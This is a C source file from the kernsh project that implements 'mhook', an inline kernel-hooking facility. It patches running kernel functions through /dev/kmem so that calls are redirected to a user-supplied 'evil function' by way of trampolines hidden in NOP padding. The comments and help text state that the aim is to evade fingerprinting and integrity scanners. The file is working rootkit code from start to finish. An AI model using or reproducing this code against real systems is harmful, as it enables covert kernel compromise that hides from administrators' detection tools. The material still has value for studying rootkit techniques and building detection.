/*
 * The project kernsh is (C) 2002-2004. This program is free software;
 * you can redistribute it and/or modify it under the terms of the GNU
 * General Public License as published by the Free Software Foundation;
 * Version 2. This guarantees your right to use, modify, and
 * redistribute this software under certain conditions.
 *
 * Source is provided to this software because we believe users have a
 * right to know exactly what a program is going to do before they run
 * it.
 *
 * This program is distributed in the hope that it will be
 * useful, but WITHOUT ANY WARRANTY; without even the implied
 * warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
 * PURPOSE. See the GNU General Public License for more details (
 * http://www.gnu.org/copyleft/gpl.html ).
 *
 */
 
/* This file was written by kstat - going to - kernsh.org */
/* It was think before I do the port of the lkh, so there is 
 * some design issue here ;). Ok, the objective of this hook
 * is to be the less visible in the kernel. it is able to escape
 * small finger prints (in a future and in some case totaly escape
 * them, only a md5sum of the running kernel could be ok
 *
 * This is very simple, and I'm quiet sure that this already exists
 * somewhere
 */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <string.h>
#include "include/kernsh.h"
#include "include/module.h"

/* In a near future will add a slot system to hijack more than 1 function
 * with hability to restore :)
 */
#define WRAP_F 0x001 /* if we malloc the memory */
#define WRAP_N 0x002 /* if we don't need to free it */
#define WRAP_SIZE 128

struct Slot {
	char * save; /* the buf containing saving bytes */
	size_t size; /* the size of this buf (not used ?) */
	size_t func; /* The hooked function */
	size_t offset; /* The offset of the hook in the function */
	size_t wrapper; /* the wrapper address */
	size_t redir; /* the address of the trempolin */
	size_t addr; /* the evil function address */
	int flag; /* some misc flags */
};

struct Slot * slot_hook[SLOT_MAX]; /* */
/*int num_slot = -1;

int debug_hook = 0;
*/
extern int num_slot;
extern int debug_hook;

/* This is a wrapper for debug */
int
my_write_kmem(void * buf,size_t to, size_t size, int fd)
{
	int n=0;
	if ( debug_hook != 0 ) {
		hexdump(buf,size,to);
	} else {
		n = write_kmem( buf, to, size, fd );
	}
	return n;
}

/* Return the size of the jump 
 * The buf size need to be  >= 7
 * if return == 7 then you need to save / restore %eax !!!1
 */
int
compute_jump(size_t from, size_t to, char * buf)
{
	ssize_t diff = to - from;
	int flop = 0x0;
	if ( ((diff - 2) < 127) && ((diff - 2) > -128) ) {
		/* jmp short */
		buf[0] = '\xeb' ;
		buf[1] = (char) (diff - 2);
		return 2;
	} else if ( ((diff - 5) < 2147483647/*32767*/) && ((diff - 5) > - 2147483647/*32768*/) ) { 
		/* This is a 16 bit limitation isn't it ??, so perhaps 
		 * better way to proceed :) */
		/* jmp near */
		buf[0] = '\xe9' ;
		flop = diff - 5;
		buf[1] = ((char*)&flop)[0]; /* Ugly isn't it ? :) */
		buf[2] = ((char*)&flop)[1];
		buf[3] = ((char*)&flop)[2];
		buf[4] = ((char*)&flop)[3];
		return 5;
	} else {
		/* jmp %eax */
		buf[0] = '\xb8';
		buf[1] = (char) ((to));
		buf[2] = (char) ((to) >> 1);
		buf[3] = (char) ((to) >> 2);
		buf[4] = (char) ((to) >> 3);
		buf[5] = '\xff';
		buf[6] = '\xe0';
		return 7;
	}
	fatal("Can't build the jump !\n");
	return -1;
}

/* In a near future I will add a function to rebuilt the STACK before calling
 * the real function ... There is better way to proceed, for sure, but my ASM
 * skills are really poor, so if you have better way to handle this send me
 * your ideas :) ( kstat at kernsh dOt org )
 *
 * ok 2 things
 *  + try using a small jump to a near wrapper (like eb ?? or e9 ?? ?? ?? ??)
 *  + be obliged to jump using jmp %eax ( b8 ?? ?? ?? ?? ff e0 )
 * for this we need to compute addr_to_h - addr_to_j - ??? (??? = -/+)
 * and select the right jmp.
 * Use a function for this :)
 */
char *
khook( size_t addr_to_h, size_t addr_to_j, int file_descriptor )
{
	char * save = NULL;
	char buf[ 8 ];
	int n = 0;
	int size = 0;
	save = malloc( sizeof(buf) );
	if ( save == NULL ) {
		perror( "khook:malloc()" );
		return( NULL );
	}

	memset( save, '\0', sizeof(buf) );
	switch((size = compute_jump(addr_to_h,addr_to_j,buf))) {
		case 2:
		case 5:
			break;
		case 7:
			fatal("khook : Jump too long !!!!\n");
			free(save);
			return( NULL );
		default:
			fatal("khook : Internal error !\n");
			free(save);
			return( NULL );
	}

	/* read for save */
	n = read_kmem( save, addr_to_h, sizeof(buf), file_descriptor );
	if ( n < 0 ) {
		fatal( "khook : read_kmem failed !\n" );
		free( save );
		return( NULL );
	}

	/* now write the hook :) */
	n = my_write_kmem( buf, addr_to_h, size, file_descriptor );
	if ( n < 0 ) {
		fatal( "khook : write_kmem failed !\n" );
		free( save );
		return( NULL );
	}
	return( save );
}

/* The future counter measure :) */
int
find_wrapper(size_t start, size_t end)
{
	/* here we will try to find a wrapper like with wildard arguments ... */
	return 0;
}

/* Because some scanning system try to know if some calls are done in the kernel
 * text area, I found usefull to place traps in unusued parts of him ...
 * First the - align 32 90 - directive give us at least ~70 * 31 spares
 * instructions ( NOP ), that we can use to rebuilt various things, like the
 * kernel stack ;).
 * Then when we want to redirect a call directly, we built all the good things
 * And just have to jump/call correctly to another area (like a module space).
 * We can collect some other parts like BUGS() directives ;) take a look at
 * $ src/kernsh
 * ...
 * % syscall -d 1 disass
 * ...
 * % quit
 *
 * The second idea that I have, Is to use this spare space to relocate an entire
 * function, which is not so simple due to the need to disassemble it, relocate
 * the jumps in the right places and so on ... not easy and perhaps not so
 * usefull.
 */
/* This is the reason why you will found a NOP seekers in this release of
 * Kernsh
 */
/* addr_func is the address of the function to hijack
 * addr_to_j is the address where you want the wrapper to jump
 */
/* This is a short schema of how it should work
 *
 * func_to_h + 10 => (save %eax, then) jmp to_wrapper [in func_to_h]
 * to_wrapper : restore the stack then jmp to_func  [near func_to_h]
 * to_func: restore %eax => execute the hook		[far func_to_h]
 *
 * jmp 
 *
 * 
 * I think about another thing, perhaps better in some cases
 * just do the following, :
 *  + put a (call near) to a small part near the function [E8????????]
 *  + in this part there is a 
 *  add %esp,4 ; discard the ret value	[81C404000000]
 *  push %eax							[50]
 *  mov %eax,addr_to_jump ;				[B8????????]
 *  jmp %eax							[FFE0]
 *  + then a
 *  pop %eax							[58]
 *  followed by the rebuild of the stack
 *  jump to my function
 */
/* 
 * Ok now, I will try to be clearer :)
 * 
 * We know the following :
 *  - Where is the function to hook
 *  - Where is the place of the wrapper (?)
 *  - Where is the evil function
 * So,
 * 1°) find where to put the hook in the function
 * 2°) find where to put the redirection
 * 3°) build the stack rebuild with the good jump to the evil function
 * 4°) write it in place
 * 5°) build the redirection knowing the place of the wrapper
 * 6°) write it near the function to hook
 * 7°) build the hook (a simple jump ;)
 * 8°) write it, et voila :)
 */
#define METHOD_WRA 8
int
put_redirection(size_t put, size_t dest)
{
	char buf[METHOD_WRA];
	memset(buf,0x90,sizeof(buf));
	buf[0] = (char) 0x50;
	if ( compute_jump(put+1,dest,&buf[1]) <= 0 ) {
		return -1;
	}
	
//	buf[1] = (char) 0xB8;
//	buf[2] = (char) ((unsigned long) dest);
//	buf[3] = (char) ((unsigned long) (dest) >> 8);
//	buf[4] = (char) ((unsigned long) (dest ) >> 16);
//	buf[5] = (char) ((unsigned long) (dest ) >> 24);
//	buf[6] = (char) 0xFF; /* jmp => */
//	buf[7] = (char) 0xE0; /* %eax */
	
	return my_write_kmem(buf,put,METHOD_WRA,file_descriptor_kmem);
}

size_t
prepare_hook( size_t * addr_func, size_t addr_wrap, size_t addr_evil )
{
	char buf[ BUFSIZ ];
	char wrap[ BUFSIZ ];
	int s_wrap = BUFSIZ - 1;
	ssize_t whook = 0; /* where to hook in the function (offset) */
	size_t wredi = 0; /* where to redirect (address) */
	int ret = 0;
	int i, pos = 0;
	
	/* Load the function into memory */
	if ( read_kmem(buf, *addr_func, sizeof(buf), file_descriptor_kmem) < 0 ) {
		fatal( "prepare_hook : read_kmem failed !\n" );
		return 0;
	}
	
	/* Find the position of the hook and rebuild the stack */
	wrap[0] = '\x58'; /* We arrive from far away :) */
	whook = (int) make_esp( buf, sizeof(buf), &wrap[1], &s_wrap );
	s_wrap++; /* for 0 */
	if ( whook == 0 )
	{
		fatal("prepare_hook : Sorry, I'm not able to rebuild the stack gave up\n");
		return 0;
	}
	
	/* add the jump to the evil function */
	switch( (ret = compute_jump( addr_wrap + s_wrap, addr_evil, &wrap[++s_wrap] )) )
	{
		case 2:
		case 5:
			wrap[s_wrap-1] = '\x90'; /* a NOP */
			s_wrap += ret;
			break;
		case 7:
			wrap[s_wrap-1] = '\x50'; /* push %eax */
			s_wrap += ret;
			fprintf(stdout,"Hope that you have put a pop %%eax in your funtion !\n");
			break;
		default:
			fatal("prepare_hook : Internal error, gave up when trying to compute the jump\n");
			return 0;
	}
	/* Ok now the stack is rebuilded, so write it */
	if ( my_write_kmem(wrap, addr_wrap, s_wrap, file_descriptor_kmem) < 0)	{
		fatal("prepare_hook : write_kmem failed !\n");
		return 0;
	}

	/* Now find the redirection position */
	/* try to find the rediretion closer to the function */
	for ( i = 0; i < METHOD_WRA; i++ ) {
		buf[i] = '\x90';
	}
	buf[i] = '\x00';
	
	do {
		wredi = kfind_area( (*addr_func) + pos * 4096, (*addr_func) + (pos + 1) * 4096, buf, METHOD_WRA,NO_JOKER );
		if ( wredi != 0 ) {
			break;
		}
		wredi = kfind_area( (*addr_func) - pos * 4096, (*addr_func) - (pos + 1) * 4096, buf, METHOD_WRA,NO_JOKER );
		if ( wredi != 0 ) {
			break;
		}
		pos++;
	} while ( pos < 8 );

	if ( wredi == 0 ) {
		fatal("prepare_hook : couldn't found an area where to put the redirection !\n");
		return 0;
	}
	/* we have the address of the redirection */
	/* So put it :) */
	if ( put_redirection( wredi, addr_wrap ) < 0 )
	{
		fatal("prepare_hook : Could not put the redirection !\n");
		return 0;
	}
	/* End with writing the hook ;) */
	(*addr_func) += whook;
	return wredi;
}

int
kunhook( size_t addr_to_h, char * buf, size_t size_buf ,int file_descriptor )
{
	int n = 0;
	
	if ( buf == NULL ) {
		fatal( "kunhook : invalid buffer !\n" );
		return( -1 );
	}
	n = my_write_kmem( buf, addr_to_h, size_buf, file_descriptor );
	if ( n < 0 ) {
		fatal( "kunhook : write_kmem failed !\n" );
		return( -1 );
	}

	free( buf );
	buf = NULL;
	return( 0 );
}

int
khide_hook ( struct Slot * slot, int hook )
{
   if ( hook != 1 ) {
		slot->offset = slot->func;
		//fprintf(stdout,"%x %x %x\n",slot->offset,slot->wrapper,slot->addr);
		slot->redir = prepare_hook(&slot->offset,slot->wrapper,slot->addr);
		if ( slot->redir == 0 ) {
			fatal("khide_hook : Gave up !\n");
			return( -1 );
		}
		slot->save = khook( slot->offset, slot->redir, file_descriptor_kmem );
		if ( slot->save == NULL ) {
			fatal("khide_hook : Not able to hook !\n");
			return( -1 );
		}
		fprintf( stdout,"Hooking done !\n" );
	} else {
		if ( kunhook(slot->offset, slot->save, slot->size, 
					file_descriptor_kmem) == -1 ) {
			return( -1 );
		}
		fprintf( stdout, "Hook removed !\n" );
	}
	return( 0 );
}

int
create_mkh(struct Slot * slot)
{
	if ( slot == NULL ) {
		return -1 ;
	}
	/* Do we need to malloc memory ? */
	if ( slot->flag == WRAP_F ) {
		kkmalloc(WRAP_SIZE,(unsigned long *)&(slot->wrapper));
		if ( slot->wrapper == 0 ) {
			return -1;
		}
	}
	
	/* Do we have all the needed infos ? */
	if ( slot->func == 0 || slot->wrapper == 0 || slot->addr == 0 ) {
		return -1;
	}
	
	slot->size = 8;
	
	/* This is not definitive */
	return khide_hook(slot,0);
}

int
delete_mkh(struct Slot * slot)
{
	int n = 0;
	char redir[8];

	memset(redir,0x90,sizeof(redir));
	
	/* Remove the hook */
	n = khide_hook(slot,1);
	
	/* free the memory of the wrapper if needed */
	if ( slot->flag == WRAP_F ) {
		kkfree(slot->wrapper);
		slot->wrapper = 0;
	}
	
	/* Restore the kernel redirector */
	my_write_kmem(redir,slot->redir,sizeof(redir),file_descriptor_kmem);
	
	return n;
}

/* General Hooking usage !! */
void
usage_hook( void )
{
	fputs(
	"This command is here to give you this short help ;)\n"
	"You have 2 Hooking technique in kernsh, one is well tested\n"
	"well known, but have a few bug in some circumstances. It's easy to check\n"
	"for hook of this kind with the check -y function ;)\n"
	"The second one, is not widely tested, still experimental, but is more \n"
	"difficult to find, even with (small) fingerprinted functions.\n\n"
	"lhook : The library kernel hooking from devlabs...\n"
	"mhook : My hooking system, not very easy to use... :)\n\n" /* Kstat :) */
	"Type \"help\" followed by command name for full documentation.\n\n",
	stdout
		);
}

void
usage_mhook( void )
{
    usage_t p_usage;

    p_usage.command_line =
		"mhook [ -ncdewb ] <arguments>";        
    p_usage.description =
		"This command makes it possible to manage hooks in memory. They are less\n"
		"detectable than lhook, but less usable too, there is no callback system.\n"
		"It's not tested, but you can try to mix mhook and lhook. Think twice before\n"
		"doing it, and be sure to understand how they work before :)";
    p_usage.arguments =
		"  -n [hook number] : (Mandatory) slot number to work on ;\n"
		"  -c [address to hook] : create a hook against this function ;\n"
		"  -w [address to wrapper] : specify an address of wrapper ;\n"
		"  -e [address to redir] : this is the evil function where to redirect ;\n"
		"  -b [redir] [function offset] [save as \\x...] : rebuild an internal hook\n"
		"     This is not really tested, You need to know internals to be able to \n"
		"     use it...\n"
		"         [redir] = address of the trempolin, \n"
		"         [function offset] = address were to write the [saved] bytes (jmp)\n"
		"         [save as \\x...] = saved bytes to recover the native function ;\n"
		"  -d : delete/remove the hook ;\n"
		"For your infos, this is Beta hooking. So Don't complain if you kill your \n"
		"kernel ;). That's some example of usage :\n"
		"\t% mhook -n 0 -c 0xc020690 -e 0xc7524456 (without a wrapper)\n"
		"\t% mhook -n 0 -d (delete it)\n"
		"\t% mhook -n 0 -c 0xc020690 -w 0xc7524400 -e 0xc7524456 (with a builtin \n"
		"wrapper, which will be overwritten with the rebuilded stack)";

    usage( &p_usage );
    return;
}	

void
do_mhook( int pargc, char * pargv[] )
{
	char c;
	size_t create = 0;
	size_t wrapper = 0;
	size_t evil_func = 0;
	int delete = 0;
	int build = 0;
	NOARGUMENTS( pargc, 1, mhook );

	optind = 0;

	while ( (c = getopt(pargc, pargv, "xbdn:w:e:c:")) != EOF ) {
		switch ( c ) {
			case 'x':
				/* This is not documented on purpose ;) */
				if ( debug_hook == 0 ) {
					fprintf(stdout,"debug mhook on\n");
					debug_hook++;
				} else {
					fprintf(stdout,"debug mhook off\n");
					debug_hook--;
				}
				return;
			case 'b': /* Rebuild a hook */
				build = 1;
				break;
			case 'c': /* Create */
				create = strtoul(optarg,NULL,0);
				break;
			case 'e': /* evil function */
				evil_func = strtoul(optarg,NULL,0);
				break;
			case 'w': /* if you want, a wrapper */
				wrapper = strtoul(optarg,NULL,0);
				break;
			case 'd':
				delete = 1;
				break;
			case 'n': /* choose the slot # */
				num_slot = atoi(optarg);
				if( num_slot >  SLOT_MAX || num_slot < 0) {
					fatal("Invalid slot number of hook !\n");
					num_slot = -1;
					return;
				}
				break;
			default:
	            usage_mhook();
	            return;
		}
    }

	/* Processing the hooking ! */
	if ( num_slot == -1 ) {
		usage_hook();
		return;
	}
	
	/* Create the hook */
	if ( create != 0 ) {
		if ( evil_func == 0 ) {
			fatal("You must provide an evil function !\n");
			goto exit;
		}
		if ( slot_hook[num_slot] != NULL ) {
			fatal("Already created slot n°%d\n",num_slot);
			goto exit;
		} else {
			slot_hook[num_slot] = (struct Slot *)
				malloc(sizeof(struct Slot));
			if ( slot_hook[num_slot] == NULL ) {
				perror("do_mhook : malloc");
				goto exit;
			}
			memset(slot_hook[num_slot],0,sizeof(slot_hook[num_slot]));
			if ( wrapper == 0 ) {
				slot_hook[num_slot]->flag = WRAP_F;
			} else {
				slot_hook[num_slot]->wrapper = wrapper;
				slot_hook[num_slot]->flag = WRAP_N;
			}
		}
		slot_hook[num_slot]->func = create;
		slot_hook[num_slot]->addr = evil_func;
		/* Create it ! */
		create_mkh(slot_hook[num_slot]);
	}
	
	if ( build == 1 ) {
		if ( slot_hook[num_slot] != NULL ) {
			fatal("Already created slot n°%d\n",num_slot);
			goto exit;
		} else {
			slot_hook[num_slot] = (struct Slot *)
			malloc(sizeof(struct Slot));
			if ( slot_hook[num_slot] == NULL ) {
				perror("do_mhook : malloc");
				goto exit;
			}
			memset(slot_hook[num_slot],0,sizeof(slot_hook[num_slot]));
		}
		slot_hook[num_slot]->redir = strtoul(pargv[optind],NULL,0);
		slot_hook[num_slot]->offset = strtoul(pargv[optind+1],NULL,0);
		slot_hook[num_slot]->save = string2hex(pargv[optind+2],
				&slot_hook[num_slot]->size);
		/* slot_hook[num_slot]->size = atoi(pargv[optind+3]); */
	}																				
	
	/* Kill the hook */
	if ( delete == 1 ) {
		if ( slot_hook[num_slot] != NULL) {
			/* delete it */
			delete_mkh(slot_hook[num_slot]);
			free(slot_hook[num_slot]);
			slot_hook[num_slot] = NULL;
		}
	}

exit:
	num_slot = -1;
    return;
}

